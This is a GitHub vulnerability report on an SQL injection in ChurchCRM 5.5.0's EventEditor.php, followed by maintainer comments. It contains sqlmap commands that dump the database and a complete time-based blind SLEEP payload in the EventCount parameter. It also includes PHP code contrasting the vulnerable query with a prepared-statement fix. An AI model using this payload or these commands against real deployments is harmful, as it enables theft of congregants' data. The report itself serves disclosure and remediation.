On what page in the application did you find this issue?
EventEditor.php
On what type of server is this running? Dedicated / Shared hosting? Linux / Windows?
Linux
What browser (and version) are you running?
Firefox
What version of PHP is the server running?
8.3.2
What version of SQL Server are you running?
11.2.2
What version of ChurchCRM are you running?
5.5.0
Severity: high
Credits:
Georgios Bitounis
Description:
SQL injection vulnerability in ChurchCRM v5.5.0 allows a remote attacker to obtain sensitive information via the EventCount POST parameter in /EventEditor.php.
Step 1: Go to EventEditor.php, create an event with whatever attributes you want, and save.
Step 2: Go to ListEvents.php and edit your event; this will take you to EventEditor.php.
Step 3: Capture the request that saves the changes with Burp Suite.
Step 4: sqlmap -r sql_eventeditor.txt
Step 5: sqlmap -r sql_eventeditor.txt --dump
Impact:
SQL injection attacks allow attackers to spoof identity, tamper with existing data, cause repudiation issues such as voiding transactions or changing balances, allow the complete disclosure of all data on the system, destroy the data or make it otherwise unavailable, and become administrators of the database server.
Affected Component:
/churchcrm/EventEditor.php
Technical Details:
The vulnerability is caused by the failure of the backend to effectively validate user input. An attacker can insert malicious SQL code and dump the database, allowing the attacker to steal sensitive information and do all the other nefarious things.
Proof of Concept (PoC):
Parameter: Array-like -9
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: EventID=2&EventExists=1&EventTypeName=Church Service&EventTypeID=1&EventTitle=Christmas Service&EventDesc=christmas service&EventDateRange=2016-12-24 10:30 PM - 2016-12-25 1:30 AM&NumAttendCounts=3&EventCount[]=100' AND (SELECT 8962 FROM (SELECT(SLEEP(5)))wjTG) AND 'LRYr'='LRYr&EventCountID[]=1&EventCountName[]=Total&EventCount[]=0&EventCountID[]=2&EventCountName[]=Members&EventCount[]=0&EventCountID[]=3&EventCountName[]=Visitors&EventCountNotes=&EventText=1&EventStatus=0&SaveChanges=Save Changes
Remediation:
1. Input validation: the simplest approach is prepared statements; all user input should be validated and filtered on the server side to ensure that it conforms to the expected format and does not contain any malicious code.
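The following PHP is an added illustration, not ChurchCRM's own code: it places the string-building pattern the report describes (each EventCount[] element interpolated into an UPDATE statement) beside a prepared-statement version that validates every element as an integer before binding it, which is the remediation the report recommends. The table and column names (event_attend, event_id, count_id, count_value), the two function names and the request array are assumptions constructed for the example; the first EventCount[] value is the reporter's time-based payload.

```php
<?php
// Added example, not ChurchCRM code. Schema and function names are assumed.

// Vulnerable pattern: every EventCount[] / EventCountID[] element lands
// inside the SQL text. The payload closes the opening quote, appends a
// subquery, and re-opens a quote so the statement still parses.
function buildVulnerableUpdate(int $eventId, array $post): string
{
    $sql = '';
    foreach ($post['EventCount'] as $i => $count) {
        $id = $post['EventCountID'][$i];
        $sql .= "UPDATE event_attend SET count_value = '" . $count . "'"
              . " WHERE event_id = " . $eventId
              . " AND count_id = '" . $id . "';\n";
    }
    return $sql;
}

// Hardened pattern: reject anything that is not an integer, then bind the
// values as parameters so the database never sees them as SQL.
function saveEventCounts(PDO $db, int $eventId, array $post): int
{
    $stmt = $db->prepare(
        'UPDATE event_attend SET count_value = :count'
        . ' WHERE event_id = :event AND count_id = :id'
    );
    $updated = 0;
    foreach ($post['EventCount'] as $i => $count) {
        $id = $post['EventCountID'][$i] ?? null;
        if (filter_var($count, FILTER_VALIDATE_INT) === false
            || filter_var($id, FILTER_VALIDATE_INT) === false) {
            throw new InvalidArgumentException(
                "EventCount[$i] or EventCountID[$i] is not an integer"
            );
        }
        $stmt->bindValue(':count', (int) $count, PDO::PARAM_INT);
        $stmt->bindValue(':event', $eventId, PDO::PARAM_INT);
        $stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
        $stmt->execute();
        $updated += $stmt->rowCount();
    }
    return $updated;
}

// Constructed request body mirroring the report's PoC (first element is the
// reporter's payload, the rest are the legitimate values).
$post = [
    'EventCount'   => [
        "100' AND (SELECT 8962 FROM (SELECT(SLEEP(5)))wjTG) AND 'LRYr'='LRYr",
        '0',
        '0',
    ],
    'EventCountID' => ['1', '2', '3'],
];

// The first generated statement reads:
//   UPDATE event_attend SET count_value = '100' AND (SELECT 8962 FROM
//   (SELECT(SLEEP(5)))wjTG) AND 'LRYr'='LRYr' WHERE event_id = 2 AND count_id = '1';
// On MySQL the SLEEP() subquery executes, which is the delay sqlmap measures.
echo buildVulnerableUpdate(2, $post);

// The hardened version refuses the same input before any query runs.
$db = new PDO('sqlite::memory:');
$db->exec('CREATE TABLE event_attend (event_id INTEGER, count_id INTEGER, count_value INTEGER)');
$db->exec('INSERT INTO event_attend VALUES (2, 1, 0), (2, 2, 0), (2, 3, 0)');
try {
    saveEventCounts($db, 2, $post);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ' . $e->getMessage() . "\n";
}

// With clean input the prepared statement updates all three rows.
$post['EventCount'][0] = '100';
echo 'rows updated: ' . saveEventCounts($db, 2, $post) . "\n";
```

The integer check is there because the counts are attendance figures; binding alone would already stop the injection, but a declared type for each field is what the remediation section means by "conforms to the expected format", and it turns a silent coercion into a visible error.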
@0xIapetus Can you please check your PHP version? PHP 7.4 hasn't been supported since ChurchCRM 5.0.3, so I am unsure how you are running the latest code.
Also, this says you are running ChurchCRM version 5.3. Have you tested this with the latest code?
The PHP version was 8.1. This has been tested on several versions, including the one git cloned/forked from GitHub (5.5.0); if you try the PoC, it will work!
0xIapetus changed the title from "2) Bug: SQL Injection - EventEditor" to "2) Bug: SQL Injection" on Feb 10, 2024
0xIapetus changed the title from "2) Bug: SQL Injection" to "2) Security Bug: SQL Injection" on Feb 10, 2024
MrClever changed the title from "2) Security Bug: SQL Injection" to "Security Bug: SQL Injection" on Feb 19, 2024
MrClever changed the title from "Security Bug: SQL Injection" to "Security Bug: SQL Injection - Event Editor" on Feb 19, 2024
MrClever changed the title from "Security Bug: SQL Injection - Event Editor" to "Security Bug: SQL Injection - Event Editor via List Events" on Feb 19, 2024